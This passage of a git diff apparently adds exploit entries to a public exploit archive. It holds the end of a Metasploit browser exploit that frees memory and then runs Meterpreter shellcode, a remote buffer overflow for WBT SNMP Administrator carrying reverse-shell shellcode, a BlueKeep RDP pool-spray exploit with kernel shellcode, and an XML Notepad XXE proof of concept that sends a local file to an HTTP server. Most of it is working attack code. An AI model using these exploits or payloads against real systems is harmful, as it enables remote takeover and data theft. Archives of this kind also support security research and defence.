+    }
+    return null;
+}
+
+
+function get_obj_idx(prop_idx) {
+    // find the index of the Object in the spray array
+    tarray[prop_idx] = 0x62626262;
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j < inners; j+=1) {
+            try {
+                if (spray[i][j].a == 0x31313131) {
+                    console.log(`found object idx in the spray array: ${i} ${j}`);
+                    return spray[i][j];
+                }
+            } catch (e) {}
+        }
+    }
+}
+
+function ta_read(addr) {
+    // reads an absolute address through the original freed region
+    // only works for ta_absolute_addr + string_size (128MiB)
+    if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {
+        return tarray[(addr-ta_absolute_addr)/4];
+    }
+
+    return 0;
+}
+
+function ta_write(addr, value) {
+    // wrtie to an absolute address through the original freed region
+    // only works for ta_absolute_addr + string_size (128MiB)
+    if (addr % 4 || value > 2**32 - 1 ||
+        addr < ta_absolute_addr ||
+        addr > ta_absolute_addr + string_size) {
+        console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);
+    }
+    tarray[(addr-ta_absolute_addr)/4] = value;
+}
+
+function get_corruptable_ui32a() {
+    // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region
+    for (let i = 0; i < outers; i++) {
+        for (let j = 0; j + 2 < inners; j+=3) {
+            let ui32a_addr = addrof(spray[i][j+2]) - 1;
+            let bs_addr = ta_read(ui32a_addr + 12) - 1;
+            let elements_addr = ta_read(ui32a_addr + 8) - 1;
+            // read its elements pointer
+            // if the elements ptr lies inside the region we have access to
+            if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&
+                elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {
+                console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);
+                return {
+                    bs_addr: bs_addr,
+                    elements_addr: elements_addr,
+                    ui32: spray[i][j+2],
+                    i: i, j: j
+                }
+            }
+        }
+    }
+}
+
+var reader_obj = null;
+var object_prop_taidx = null;
+var ta_absolute_addr = null;
+var aarw_ui32 = null;
+
+function addrof(leaked_obj) {
+    reader_obj.a = leaked_obj;
+    return tarray[object_prop_taidx];
+}
+
+
+function read4(addr) {
+    // save the old values
+    let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
+    let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
+
+    // rewrite the backing store ptr
+    ta_write(aarw_ui32.elements_addr + 12, addr);
+    ta_write(aarw_ui32.bs_addr + 16, addr);
+
+    let val = aarw_ui32.ui32[0];
+
+    ta_write(aarw_ui32.elements_addr + 12, tmp1);
+    ta_write(aarw_ui32.bs_addr + 16, tmp2);
+
+    return val;
+}
+
+function write4(addr, val) {
+    // save the old values
+    let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
+    let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
+
+    // rewrite the backing store ptr
+    ta_write(aarw_ui32.elements_addr + 12, addr);
+    ta_write(aarw_ui32.bs_addr + 16, addr);
+
+    aarw_ui32.ui32[0] = val;
+
+    ta_write(aarw_ui32.elements_addr + 12, tmp1);
+    ta_write(aarw_ui32.bs_addr + 16, tmp2);
+}
+
+function get_rw() {
+    // free up as much memory as possible
+    // spray = null;
+    // contents = null;
+    force_gc();
+
+    // attepmt reclaiming the memory pointed to by dangling pointer
+    reclaim_mixed();
+
+    // access the reclaimed region as a Uint32Array
+    tarray = new Uint32Array(lastlast);
+    object_prop_taidx = find_pattern();
+    if (object_prop_taidx === null) {
+        console.log('ERROR> failed to find marker');
+        window.top.postMessage(`ERROR> failed to find marker`, '*');
+        return;
+    }
+
+    // leak the absolute address of the Object
+    const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1;  // the third property of the sprayed Object is self-referential
+    ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4
+    console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);
+    console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);
+
+    reader_obj = get_obj_idx(object_prop_taidx);
+    if (reader_obj == undefined) {
+        console.log(`ERROR> failed to find object`);
+        window.top.postMessage(`ERROR> failed to find object`, '*');
+        return;
+    }
+    // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray
+
+    console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);
+    aarw_ui32 = get_corruptable_ui32a();
+    // arbitrary read write up after this point
+}
+
+var wfunc = null;
+let meterpreter = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
+
+function rce() {
+    function get_wasm_func() {
+        var importObject = {
+            imports: { imported_func: arg => console.log(arg) }
+        };
+        bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
+        wasm_code = new Uint8Array(bc);
+        wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
+        return wasm_mod.exports.exported_func;
+    }
+
+    let wasm_func = get_wasm_func();
+    wfunc = wasm_func;
+    // traverse the JSFunction object chain to find the RWX WebAssembly code page
+    let wasm_func_addr = addrof(wasm_func) - 1;
+    let sfi = read4(wasm_func_addr + 12) - 1;
+    let WasmExportedFunctionData = read4(sfi + 4) - 1;
+    let instance = read4(WasmExportedFunctionData + 8) - 1;
+    let rwx_addr = read4(instance + 0x74);
+
+    // write the shellcode to the RWX page
+    if (meterpreter.length % 2 != 0)
+        meterpreter += "\\u9090";
+
+    for (let i = 0; i < meterpreter.length; i += 2) {
+        write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);
+    }
+
+    // if we got to this point, the exploit was successful
+    window.top.postMessage('SUCCESS', '*');
+    console.log('success');
+    wfunc();
+
+    // invoke the shellcode
+    //window.setTimeout(wfunc, 1000);
+}
+
+function force_gc() {
+    // forces a garbage collection to avoid OOM kills
+    try {
+        var failure = new WebAssembly.Memory({initial: 32767});
+    } catch(e) {
+        // console.log(e.message);
+    }
+}
+
+function init() {
+    abs = [];
+    tarray = 0;
+    onprogress_cnt = 0;
+    try_cnt = 0;
+    last = 0, lastlast = 0;
+    reader = new FileReader();
+
+    reader.onloadend = function(evt) {
+        try_cnt += 1;
+        failure = false;
+        if (onprogress_cnt < 2) {
+            console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);
+            failure = true;
+        }
+
+        if (lastlast.byteLength != f.size) {
+            console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);
+            failure = true;
+        }
+
+        if (failure === true) {
+            console.log('retrying in 1 second');
+            window.setTimeout(exploit, 1);
+            return;
+        }
+
+        console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);
+        try {
+            // trigger the FREE
+            myWorker.postMessage([last], [last, lastlast]);
+        } catch(e) {
+            // an exception with this message indicates that the FREE part of the exploit was successful
+            if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {
+                get_rw();
+                rce();
+                return;
+            } else {
+                console.log(e.message);
+            }
+        }
+    }
+    reader.onprogress = function(evt) {
+        force_gc();
+        let res = evt.target.result;
+        // console.log(`onprogress ${onprogress_cnt}`);
+        onprogress_cnt += 1;
+        if (res.byteLength != f.size) {
+            // console.log(`result has a different size than expected: ${res.byteLength}`);
+            return;
+        }
+        lastlast = last;
+        last = res;
+    }
+    if (spray === null) {
+        // allocate the spray holders if needed
+        allocate_spray_holders();
+    }
+
+    // clear the spray holder arrays
+    clear_spray();
+
+    // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit
+    try {
+        let failure = new ArrayBuffer(1024 * 1024 * 1024);
+    } catch (e) {
+        console.log(e.message);
+    }
+
+    force_gc();
+}
+
+function exploit() {
+    init();
+    reader.readAsArrayBuffer(f);
+    console.log(`attempt ${try_cnt} started`);
+}
+        </script>
+    </head>
+    <body onload="exploit()">
+    </body>
+</html>
+    ^
+      send_response(cli, html)
+    elsif request.uri =~ %r{/worker.js$}
+      send_response(cli, 'onmessage = function (msg) { }')
+    else
+      uripath = datastore['URIPATH'] || get_resource
+      uripath += '/' unless uripath.end_with? '/'
+      html = %Q^
+<html>
+    <head>
+        <script>
+            function iter() {
+                let iframe = null;
+                try {
+                    iframe = document.getElementById('myframe');
+                    document.body.removeChild(iframe);
+                } catch (e) {}
+
+                iframe = document.createElement('iframe');
+                iframe.src = '#{uripath}exploit.html';
+                iframe.id = 'myframe';
+                iframe.style = "width:0; height:0; border:0; border:none; visibility=hidden"
+                document.body.appendChild(iframe);
+                console.log(document.getElementById('myframe'));
+            }
+
+            function brute() {
+                window.setTimeout(iter, 1000);
+                let interval = window.setInterval(iter, 15000);
+
+                window.onmessage = function(e) {
+                    if (e.data.includes('SUCCESS')) {
+                        console.log('exploit successful!');
+                        window.clearInterval(interval);
+                    }
+                    console.log(e);
+                }
+            }
+        </script>
+    </head>
+    <body onload="brute()"></body>
+</html>
+    ^
+      send_response(cli, html)
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/47137.py b/exploits/windows_x86/remote/47137.py
new file mode 100755
index 000000000..3144dedf0
--- /dev/null
+++ b/exploits/windows_x86/remote/47137.py
@@ -0,0 +1,136 @@
+# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
+# Author: sasaga92
+# Discovery Date: 2019-07-18
+# Vendor Homepage: www.computerlab.com
+# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
+# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
+# Tested on OS: Windows XP SP2 x86
+# CVE: N/A
+# [+] Credits: John Page (aka hyp3rlinx)  
+
+
+#!/usr/bin/python
+
+import sys
+import socket
+import random
+import string
+import struct
+
+
+
+def pattern_create(_type,_length):
+  _type = _type.split(" ")
+
+  if _type[0] == "trash":
+    return _type[1] * _length
+  elif _type[0] == "random":
+    return ''.join(random.choice(string.lowercase) for i in range(_length))
+  elif _type[0] == "pattern":
+    _pattern = ''
+    _parts = ['A', 'a', '0']
+    while len(_pattern) != _length:
+      _pattern += _parts[len(_pattern) % 3]
+      if len(_pattern) % 3 == 0:
+        _parts[2] = chr(ord(_parts[2]) + 1)
+        if _parts[2] > '9':
+          _parts[2] = '0'
+          _parts[1] = chr(ord(_parts[1]) + 1)
+          if _parts[1] > 'z':
+            _parts[1] = 'a'
+            _parts[0] = chr(ord(_parts[0]) + 1)
+            if _parts[0] > 'Z':
+              _parts[0] = 'A'
+    return _pattern
+  else:
+    return "Not Found"
+
+def pwned(_host, _port, _payload):
+  print "[*] Conectandose a {0}:{1}...".format(_host, _port)
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((_host, _port))
+  print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
+  _payload = "{0}\r\n\r\n".format(_payload)
+  s.send(_payload)
+  _data = s.recv(1024)
+  s.shutdown
+  s.close
+  print 'Recibido:', repr(_data)
+  print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))
+
+
+def main():
+
+  _host = "192.168.0.12"
+  _port = 987
+  _offset_eip = 642200
+  _padding = 642144
+  _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
+  _tag = "w00tw00t"
+
+  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
+  _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+    "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
+    "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
+    "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
+    "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
+    "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
+    "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
+    "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
+    "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
+    "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
+    "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
+    "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
+    "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
+    "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
+    "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
+    "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
+    "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
+    "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
+    "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
+    "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
+    "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
+    "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
+    "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
+    "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
+    "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
+    "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
+    "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
+    "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
+    "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
+    "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
+    "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
+    "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
+    "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
+    "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
+    "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
+    "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
+    "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
+    "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
+    "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
+    "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
+    "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
+    "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
+    "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
+    "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
+    "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
+    "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
+    "\x70\x73\x63\x69\x6f\x59\x45\x41\x41")
+
+  _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+ 
+  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
+  _inject += _tag
+  _inject += _shellcode
+  _inject += _egghunter
+  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
+  _inject += _eip
+  
+  print(_inject)
+  pwned(_host,_port,_inject)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/47683.py b/exploits/windows_x86/remote/47683.py
new file mode 100755
index 000000000..ef416f292
--- /dev/null
+++ b/exploits/windows_x86/remote/47683.py
@@ -0,0 +1,177 @@
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip
+
+import rdp
+import socket
+import binascii
+import time
+
+def pool_spray(s, crypter, payload):
+
+    times = 10000
+    count = 0
+
+    while count < times: 
+
+        count += 1 
+        #print('time through %d' % count)
+
+        try: 
+
+            s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, payload))
+
+        except ConnectionResetError:
+
+            print('ConnectionResetError pool_spray Aborting')
+
+            quit()
+
+def main():
+
+    # change to your target
+    host = '192.168.0.46'
+    port = 3389
+
+    times = 4000
+    count = 0
+
+    target = (host, port)
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(target)
+
+    crypter = rdp.connect(s)
+
+    # this address was choosen for the pool spray. it could be be
+    # modified for potentially higher success rates.
+    # in my testing against the win7 VM it is around 80% success
+    # 0x874ff028
+    shellcode_address = b'\x28\xf0\x4f\x87'
+
+    # replace buf with your shellcode
+    buf =  b""
+    buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+    buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+    buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+    buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+    buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+    buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+    buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+    buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+    buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+    buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+    buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
+    buf += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
+    buf += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
+    buf += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
+    buf += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x00\x22\x68"
+    buf += b"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
+    buf += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
+    buf += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
+    buf += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
+    buf += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
+    buf += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
+    buf += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
+    buf += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
+    buf += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
+    buf += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
+
+
+    # bluekeep_kshellcode_x86.asm
+    # ring 0 to ring 3 shellcode
+    shellcode = b""
+    shellcode += b"\x60\xe8\x00\x00\x00\x00\x5b\xe8\x26\x00\x00\x00"
+    shellcode += b"\xb9\x76\x01\x00\x00\x0f\x32\x8d\x7b\x3c\x39\xf8"
+    shellcode += b"\x74\x11\x39\x45\x00\x74\x06\x89\x45\x00\x89\x55"
+    shellcode += b"\x08\x89\xf8\x31\xd2\x0f\x30\x61\xf4\xeb\xfd\xc2"
+    shellcode += b"\x24\x00\x8d\xab\x00\x10\x00\x00\xc1\xed\x0c\xc1"
+    shellcode += b"\xe5\x0c\x83\xed\x50\xc3\xb9\x23\x00\x00\x00\x6a"
+    shellcode += b"\x30\x0f\xa1\x8e\xd9\x8e\xc1\x64\x8b\x0d\x40\x00"
+    shellcode += b"\x00\x00\x8b\x61\x04\x51\x9c\x60\xe8\x00\x00\x00"
+    shellcode += b"\x00\x5b\xe8\xcb\xff\xff\xff\x8b\x45\x00\x83\xc0"
+    shellcode += b"\x17\x89\x44\x24\x24\x31\xc0\x99\x42\xf0\x0f\xb0"
+    shellcode += b"\x55\x08\x75\x12\xb9\x76\x01\x00\x00\x99\x8b\x45"
+    shellcode += b"\x00\x0f\x30\xfb\xe8\x04\x00\x00\x00\xfa\x61\x9d"
+    shellcode += b"\xc3\x8b\x45\x00\xc1\xe8\x0c\xc1\xe0\x0c\x2d\x00"
+    shellcode += b"\x10\x00\x00\x66\x81\x38\x4d\x5a\x75\xf4\x89\x45"
+    shellcode += b"\x04\xb8\x78\x7c\xf4\xdb\xe8\xd3\x00\x00\x00\x97"
+    shellcode += b"\xb8\x3f\x5f\x64\x77\x57\xe8\xc7\x00\x00\x00\x29"
+    shellcode += b"\xf8\x89\xc1\x3d\x70\x01\x00\x00\x75\x03\x83\xc0"
+    shellcode += b"\x08\x8d\x58\x1c\x8d\x34\x1f\x64\xa1\x24\x01\x00"
+    shellcode += b"\x00\x8b\x36\x89\xf2\x29\xc2\x81\xfa\x00\x04\x00"
+    shellcode += b"\x00\x77\xf2\x52\xb8\xe1\x14\x01\x17\xe8\x9b\x00"
+    shellcode += b"\x00\x00\x8b\x40\x0a\x8d\x50\x04\x8d\x34\x0f\xe8"
+    shellcode += b"\xcb\x00\x00\x00\x3d\x5a\x6a\xfa\xc1\x74\x0e\x3d"
+    shellcode += b"\xd8\x83\xe0\x3e\x74\x07\x8b\x3c\x17\x29\xd7\xeb"
+    shellcode += b"\xe3\x89\x7d\x0c\x8d\x1c\x1f\x8d\x75\x10\x5f\x8b"
+    shellcode += b"\x5b\x04\xb8\x3e\x4c\xf8\xce\xe8\x61\x00\x00\x00"
+    shellcode += b"\x8b\x40\x0a\x3c\xa0\x77\x02\x2c\x08\x29\xf8\x83"
+    shellcode += b"\x7c\x03\xfc\x00\x74\xe1\x31\xc0\x55\x6a\x01\x55"
+    shellcode += b"\x50\xe8\x00\x00\x00\x00\x81\x04\x24\x92\x00\x00"
+    shellcode += b"\x00\x50\x53\x29\x3c\x24\x56\xb8\xc4\x5c\x19\x6d"
+    shellcode += b"\xe8\x25\x00\x00\x00\x31\xc0\x50\x50\x50\x56\xb8"
+    shellcode += b"\x34\x46\xcc\xaf\xe8\x15\x00\x00\x00\x85\xc0\x74"
+    shellcode += b"\xaa\x8b\x45\x1c\x80\x78\x0e\x01\x74\x07\x89\x00"
+    shellcode += b"\x89\x40\x04\xeb\x9a\xc3\xe8\x02\x00\x00\x00\xff"
+    shellcode += b"\xe0\x60\x8b\x6d\x04\x97\x8b\x45\x3c\x8b\x54\x05"
+    shellcode += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\x49"
+    shellcode += b"\x8b\x34\x8b\x01\xee\xe8\x1d\x00\x00\x00\x39\xf8"
+    shellcode += b"\x75\xf1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
+    shellcode += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24"
+    shellcode += b"\x1c\x61\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01"
+    shellcode += b"\xc2\x85\xc0\x75\xf6\x92\x5a\xc3\x58\x89\x44\x24"
+    shellcode += b"\x10\x58\x59\x58\x5a\x60\x52\x51\x8b\x28\x31\xc0"
+    shellcode += b"\x64\xa2\x24\x00\x00\x00\x99\xb0\x40\x50\xc1\xe0"
+    shellcode += b"\x06\x50\x54\x52\x89\x11\x51\x4a\x52\xb8\xea\x99"
+    shellcode += b"\x6e\x57\xe8\x7b\xff\xff\xff\x85\xc0\x75\x4f\x58"
+    shellcode += b"\x8b\x38\xe8\x00\x00\x00\x00\x5e\x83\xc6\x55\xb9"
+    shellcode += b"\x00\x04\x00\x00\xf3\xa4\x8b\x45\x0c\x50\xb8\x48"
+    shellcode += b"\xb8\x18\xb8\xe8\x56\xff\xff\xff\x8b\x40\x0c\x8b"
+    shellcode += b"\x40\x14\x8b\x00\x66\x83\x78\x24\x18\x75\xf7\x8b"
+    shellcode += b"\x50\x28\x81\x7a\x0c\x33\x00\x32\x00\x75\xeb\x8b"
+    shellcode += b"\x58\x10\x89\x5d\x04\xb8\x5e\x51\x5e\x83\xe8\x32"
+    shellcode += b"\xff\xff\xff\x59\x89\x01\x31\xc0\x88\x45\x08\x40"
+    shellcode += b"\x64\xa2\x24\x00\x00\x00\x61\xc3\x5a\x58\x58\x59"
+    shellcode += b"\x51\x51\x51\xe8\x00\x00\x00\x00\x83\x04\x24\x09"
+    shellcode += b"\x51\x51\x52\xff\xe0\x31\xc0"
+
+    shellcode += buf
+
+    print('shellcode len: %d' % len(shellcode))
+
+    payload_size = 1600
+    payload = b'\x2c\xf0\x4f\x87' + shellcode
+    payload = payload + b'\x5a' * (payload_size - len(payload))
+
+
+    print('[+] spraying pool')
+    pool_spray(s, crypter, payload)
+
+    fake_obj_size = 168
+    call_offset = 108
+    fake_obj = b'\x00'*call_offset + shellcode_address
+    fake_obj =  fake_obj + b'\x00' * (fake_obj_size - len(fake_obj)) 
+
+    time.sleep(.5)
+    print('[+] sending free')
+    s.sendall(rdp.free_32(crypter))
+    time.sleep(.15)
+
+    print('[+] allocating fake objects')
+    while count < times:
+        
+        count += 1 
+        #print('time through %d' % count)
+
+        try: 
+
+            s.sendall(rdp.write_virtual_channel(crypter, 7, 1005, fake_obj))
+
+        except ConnectionResetError:
+
+            s.close()
+
+    s.close()
+
+
+if __name__== "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/xml/local/47606.txt b/exploits/xml/local/47606.txt
new file mode 100644
index 000000000..7fe37c9b2
--- /dev/null
+++ b/exploits/xml/local/47606.txt
@@ -0,0 +1,29 @@
+# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
+# Date: 2019-11-11
+# Exploit Author: 8-Team / daejinoh
+# Vendor Homepage:  https://www.microsoft.com/  
+# Software Link:  https://github.com/microsoft/XmlNotepad  
+# Version: XML Notepad 2.8.0.4
+# Tested on: Windows 10 Pro
+# CVE : N/A
+
+# Step
+1) File -> Open -> *.xml
+
+# Exploit Code
+
+1) Server(python 3.7) : python -m http.server
+2) Poc.xml : 
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+3) payload.dtd
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
+%all;
+
+  --------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/exploits/xml/local/47729.txt b/exploits/xml/local/47729.txt
new file mode 100644
index 000000000..3b18accf6
--- /dev/null
+++ b/exploits/xml/local/47729.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Visual Studio 2008 - XML External Entity Injection
